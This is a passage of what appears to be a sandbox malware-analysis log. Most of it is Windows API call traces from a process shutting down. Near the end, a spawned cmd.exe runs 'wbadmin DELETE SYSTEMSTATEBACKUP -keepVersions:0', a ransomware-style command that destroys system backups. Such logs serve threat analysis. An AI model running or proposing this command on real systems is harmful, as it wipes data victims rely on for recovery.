lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.100] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.257] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64be70 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64bd70 | out: hHeap=0x610000) returned 1 [0077.258] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.259] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.259] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64ba20 | out: hHeap=0x610000) returned 1 [0077.259] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6293b0 | out: hHeap=0x610000) returned 1 [0077.259] IUnknown:Release (This=0x63eb00) returned 0x0 [0077.259] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.259] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6247b0 | out: hHeap=0x610000) returned 1 [0077.259] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.259] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x649880 | out: hHeap=0x610000) returned 1 [0077.259] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x643b90 | out: hHeap=0x610000) returned 1 [0077.260] GetModuleHandleW (lpModuleName="OLEAUT32") returned 0x76e40000 [0077.260] GetProcAddress (hModule=0x76e40000, lpProcName=0xc9) returned 0x76e44af8 [0077.260] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0077.260] IInternetSession:UnregisterNameSpace (This=0x63ee70, pCF=0x75028c50, pszProtocol="res") returned 0x0 [0077.260] IUnknown:Release (This=0x75028c50) returned 0x1 [0077.260] IInternetSession:UnregisterNameSpace (This=0x63ee70, pCF=0x75028c70, pszProtocol="about") returned 0x0 [0077.260] IUnknown:Release (This=0x75028c70) returned 0x1 [0077.260] IUnknown:Release (This=0x63ee70) returned 0x1 [0077.260] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6335e8 | out: hHeap=0x610000) returned 1 [0077.260] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64fa88 | out: hHeap=0x610000) returned 1 [0077.260] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6240e0 | out: hHeap=0x610000) returned 1 [0077.260] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f350 | out: hHeap=0x610000) returned 1 [0077.260] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64fb00 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d0f0 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x624798 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64bb48 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64f600 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6247c8 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6249a8 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64e278 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f368 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6487c0 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f2c0 | out: hHeap=0x610000) returned 1 [0077.261] IUnknown:Release (This=0x646678) returned 0x0 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x641ea0 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.261] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f188 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63e0c8 | out: hHeap=0x610000) returned 1 [0077.262] DeleteDC (hdc=0x3010a0f) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x643508 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6434a0 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x629180 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x643850 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x643578 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6291d0 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x652f60 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x629130 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x629220 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65d208 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x629270 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x629310 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x629360 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.262] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x643a48 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6439b0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x643948 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6435e0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6292c0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64d828 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64d7d0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64cfc8 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64c7c0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64c730 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63b870 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x685ad0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6333c8 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63aac0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6290e0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65eae0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x65eb28 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x683270 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x67a350 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f158 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.263] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f170 | out: hHeap=0x610000) returned 1 [0077.263] GetCurrentThreadId () returned 0x2a8 [0077.263] DestroyWindow (hWnd=0x202ac) returned 1 [0077.366] NtdllDefWindowProc_W () returned 0x0 [0077.367] NtdllDefWindowProc_W () returned 0x0 [0077.367] NtdllDefWindowProc_W () returned 0x0 [0077.367] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.367] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63ea78 | out: hHeap=0x610000) returned 1 [0077.367] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d718 | out: hHeap=0x610000) returned 1 [0077.367] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.367] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.367] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.367] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63f248 | out: hHeap=0x610000) returned 1 [0077.367] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.368] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x63de18 | out: hHeap=0x610000) returned 1 [0077.368] SetEvent (hEvent=0x150) returned 1 [0077.370] GetCurrentThreadId () returned 0x2a8 [0077.370] WaitForSingleObject (hHandle=0x12c, dwMilliseconds=0x1388) returned 0x0 [0077.370] GetExitCodeThread (in: hThread=0x12c, lpExitCode=0x18f874 | out: lpExitCode=0x18f874) returned 1 [0077.370] CActiveIMMAppEx_Trident:IUnknown:Release (This=0x644ee8) returned 0x0 [0077.370] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.370] ReleaseActCtx (in: hActCtx=0x63e17c | out: hActCtx=0x63e17c) [0077.370] FreeLibrary (hLibModule=0x73710000) returned 1 [0077.370] FreeLibrary (hLibModule=0x73710000) returned 1 [0077.370] UnregisterClassW (lpClassName=0xc168, hInstance=0x74af0000) returned 1 [0077.370] UnregisterClassW (lpClassName=0xc16a, hInstance=0x74af0000) returned 1 [0077.370] OleUninitialize () [0077.464] DestroyWindow (hWnd=0x50116) returned 1 [0077.464] NtdllDefWindowProc_W () returned 0x0 [0077.465] PostQuitMessage (nExitCode=0) [0077.466] DllCanUnloadNow () returned 0x0 [0077.466] DllCanUnloadNow () returned 0x1 [0077.466] DllCanUnloadNow () returned 0x1 [0077.467] free (_Block=0x3bdcc0) [0077.889] GetProcAddress (hModule=0x77710000, lpProcName="UnregisterTraceGuids") returned 0x77c99286 [0077.889] EtwUnregisterTraceGuids () returned 0x0 [0077.889] GetProcAddress (hModule=0x77710000, lpProcName="UnregisterTraceGuids") returned 0x77c99286 [0077.889] EtwUnregisterTraceGuids () returned 0x0 [0077.890] ??3@YAXPAX@Z () returned 0x1 [0077.890] free (_Block=0x3bdbb0) [0077.892] NtdllDefWindowProc_W () returned 0x0 [0077.893] FreeLibrary (hLibModule=0x74af0000) returned 1 [0077.900] GetCurrentThreadId () returned 0x2a8 [0077.900] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6333e8 | out: hHeap=0x610000) returned 1 [0077.900] DeleteObject (ho=0x170a08ae) returned 1 [0077.900] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x649c88 | out: hHeap=0x610000) returned 1 [0077.900] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x686f88 | out: hHeap=0x610000) returned 1 [0077.900] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x649f10 | out: hHeap=0x610000) returned 1 [0077.900] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x692000 | out: hHeap=0x610000) returned 1 [0077.900] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x67a250 | out: hHeap=0x610000) returned 1 [0077.900] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62f3a0 | out: hHeap=0x610000) returned 1 [0077.900] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d120 | out: hHeap=0x610000) returned 1 [0077.900] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x644bc8 | out: hHeap=0x610000) returned 1 [0077.900] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x64fb78 | out: hHeap=0x610000) returned 1 [0077.901] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.901] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.901] DeleteObject (ho=0xe0806be) returned 1 [0077.901] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d150 | out: hHeap=0x610000) returned 1 [0077.901] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62d0c0 | out: hHeap=0x610000) returned 1 [0077.901] EtwUnregisterTraceGuids () returned 0x0 [0077.901] EtwUnregisterTraceGuids () returned 0x0 [0077.901] EtwEventUnregister () returned 0x0 [0077.901] EtwEventUnregister () returned 0x0 [0077.901] CloseHandle (hObject=0xbc) returned 1 [0077.901] UnmapViewOfFile (lpBaseAddress=0x1a0000) returned 1 [0077.902] CloseHandle (hObject=0xc0) returned 1 [0077.902] LocalFree (hMem=0x62e948) returned 0x0 [0077.902] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.902] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.902] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.902] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.902] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.902] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.902] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.902] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.902] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.903] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x6352a8 | out: hHeap=0x610000) returned 1 [0077.903] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.903] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.903] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.903] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.903] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x610000) returned 1 [0077.903] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62e740 | out: hHeap=0x610000) returned 1 [0077.903] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x623cf0 | out: hHeap=0x610000) returned 1 [0077.903] HeapFree (in: hHeap=0x610000, dwFlags=0x0, lpMem=0x62e988 | out: hHeap=0x610000) returned 1 [0077.903] FreeLibrary (hLibModule=0x76e40000) returned 1 [0077.903] FreeLibrary (hLibModule=0x75300000) returned 1 [0077.903] free (_Block=0x3b2640) [0077.910] GetModuleHandleA (lpModuleName="mscoree.dll") returned 0x0 [0077.910] ExitProcess (uExitCode=0x0) Thread: id = 19 os_tid = 0x8ec Thread: id = 21 os_tid = 0x92c [0067.728] GetCurrentThreadId () returned 0x92c [0067.728] LoadLibraryW (lpLibFileName="mshtml.dll") returned 0x74af0000 [0067.729] CoInitialize (pvReserved=0x0) returned 0x0 [0067.729] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x927c0) returned 0x0 [0075.434] RtlAllocateHeap (HeapHandle=0x610000, Flags=0x0, Size=0x1006) returned 0x693fe8 [0075.434] PostMessageW (hWnd=0x202ac, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0075.435] WaitForSingleObject (hHandle=0x150, dwMilliseconds=0x927c0) returned 0x0 [0077.368] CoUninitialize () [0077.369] FreeLibraryAndExitThread (hLibModule=0x74af0000, dwExitCode=0x0) [0077.369] GetCurrentThreadId () returned 0x92c Thread: id = 24 os_tid = 0x95c [0068.732] GetCurrentThreadId () returned 0x95c Thread: id = 31 os_tid = 0x9cc [0069.677] GetCurrentThreadId () returned 0x9cc Thread: id = 32 os_tid = 0x9dc [0069.710] GetCurrentThreadId () returned 0x9dc Thread: id = 33 os_tid = 0x9ec [0074.321] GetCurrentThreadId () returned 0x9ec [0074.578] GetCurrentThreadId () returned 0x9ec Thread: id = 35 os_tid = 0xa1c [0074.663] GetCurrentThreadId () returned 0xa1c [0074.689] GetCurrentThreadId () returned 0xa1c Thread: id = 36 os_tid = 0xa2c [0074.699] GetCurrentThreadId () returned 0xa2c Thread: id = 38 os_tid = 0x600 [0074.777] GetCurrentThreadId () returned 0x600 [0074.866] GetCurrentThreadId () returned 0x600 Thread: id = 40 os_tid = 0xb64 [0074.935] GetCurrentThreadId () returned 0xb64 [0075.007] GetCurrentThreadId () returned 0xb64 Thread: id = 42 os_tid = 0xbac [0075.128] GetCurrentThreadId () returned 0xbac [0075.402] GetCurrentThreadId () returned 0xbac Process: id = "9" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x47abe000" os_pid = "0x9fc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x5bc" cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /c wbadmin DELETE SYSTEMSTATEBACKUP -keepVersions:0" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 34 os_tid = 0xa0c [0076.913] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ef7c4 | out: 